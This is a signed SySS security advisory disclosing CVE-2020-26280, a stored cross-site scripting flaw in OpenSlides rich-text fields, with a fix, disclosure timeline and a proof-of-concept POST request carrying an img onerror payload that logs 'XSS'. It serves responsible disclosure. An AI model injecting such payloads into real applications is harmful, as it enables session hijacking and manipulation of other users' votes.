-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2020-043
Product:                   OpenSlides
Manufacturer:              OpenSlides
Affected Version(s):       3.2 and 3.3, before 2020-11-20
Tested Version(s):         3.3-master-20201111
Vulnerability Type:        Cross-Site Scripting (CWE-79)
Risk Level:                High
CVSS Score:                CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
Solution Status:           Fixed
Manufacturer Notification: 2020-11-20
Solution Date:             2020-11-20
Public Disclosure:         2020-12-18
CVE Reference:             CVE-2020-26280
Author of Advisory:        Thibaud Kehler, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

OpenSlides is the all-in-one solution for running plenary meetings
and conferences.[1]

Due to insufficient user input validation and escaping, OpenSlides is vulnerable
to persistent cross-site scripting (XSS).

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

In the web application, users can enter rich text in various places, e.g.
for personal notes or in motions. These fields can be used to store arbitrary
JavaScript code that will be executed when other users read the respective
text.

An attacker could utilize this vulnerability to manipulate votes
of other users, hijack the moderator's session or simply disturb the
meeting.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Create a new motion via the REST web service:

POST /rest/motions/motion/ HTTP/1.1
Host: demo.openslides.org
Content-Type: application/json
X-CSRFToken: REDACTED
Content-Length: 215
Cookie: OpenSlidesCsrfToken=REDACTED; OpenSlidesSessionID=REDACTED

{
"collectionString":"motions/motion",
"title":"Test",
"text":"<img src='x' onerror=console.log('XSS') />",
"attachments_id":[],
"agenda_create":false,
"agenda_type":2,
"supporters_id":[],
"workflow_id":1
}

Use the browser to navigate to the motion at
https://demo.openslides.org/motions/<ID> and open the browser console.
If the JavaScript code is executed, the console should contain the
message "XSS".

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Update OpenSlides to version 3.3 or newer and ensure that it includes the
hotfix from November 20, 2020 (commit f3809fc8a97ee305d721662a75f788f9e9d21938).

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2020-11-19: Vulnerability discovered
2020-11-20: Vulnerability reported to manufacturer
2020-11-20: Hotfix released by manufacturer
2020-12-18: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for OpenSlides
    https://openslides.com/
[2] GitHub repository for OpenSlides
    https://github.com/OpenSlides/OpenSlides
[3] GitHub security advisory
    https://github.com/OpenSlides/OpenSlides/security/advisories/GHSA-w5wr-98qm-jx92
[4] SySS security advisory SYSS-2020-043
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-043.txt
[5] SySS responsible disclosure policy
    https://www.syss.de/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Thibaud Kehler of SySS GmbH.

E-Mail: thibaud.kehler@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Thibaud_Kehler.asc
Key ID: 0xB6457D7A
Key Fingerprint: CF29 54F1 1B7F 2FF5 7ED9 9BAD E9C7 9866 B645 7D7A

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEzylU8Rt/L/V+2Zut6ceYZrZFfXoFAl/8LpMACgkQ6ceYZrZF
fXqXiBAAiviYJOgVK4OpJxFshAx2WzXD4CvV42Ard22AJbQIkEj6T7xSnUGb/k2p
9Qngp9rArX5XQCnW3pne1jPKNhOBA5B8/e/MBn1d3FofVQrt3XVFJkQcPN2zj0My
jpVlsfUd21Oh89Qd09I0Xyiw5iwCDe8yPbPdS10KFNSrclLEY6Y2Rlt5Lu6tjb0r
vaIQ1XrG4xmXG1bNfR0Ws9eOCSVmsQGGiEnVoG1rU48L66UxG0s0xork8NjAszAW
QpstbubHaN2NiRLqQGY6+SWVe6/X+og0g5rwTh4XsCEjgphPkGi4odPsMV/aZHQW
37p19gGre12BXhRcegjRM1ezMX6fntuD2fR8Yut50p7NRtdpjezDsA6hbNzmGlka
z/SKpnJESNQs9t5z+8IDNTkYkPzszPXXUWxYPImAPTsbBrXsRJ5B1snTLV4kQFyb
wpfzdIYN4h3+/4Kv/fqRzbSuF1CTqKiS5/j1W5i85CExHUheaLxTSYmdEXPSl+3N
MX3skDbmfagFZiYnWNsWskr7l6gGEsB5sjVf+LBDPT1JYjmUUcxwsRg5E5NVrBMQ
Z5Ie/yVPaSsb0WxBlA1azHzcGymlHHGY0WbY24uh6o15HOL9t4WVvv8XhuKPOEdZ
GFfrwU9qXfuolt10WUzXkoePP6rHVyzolwDoPNC5r+Q0spmmN8A=
=jqHu
-----END PGP SIGNATURE-----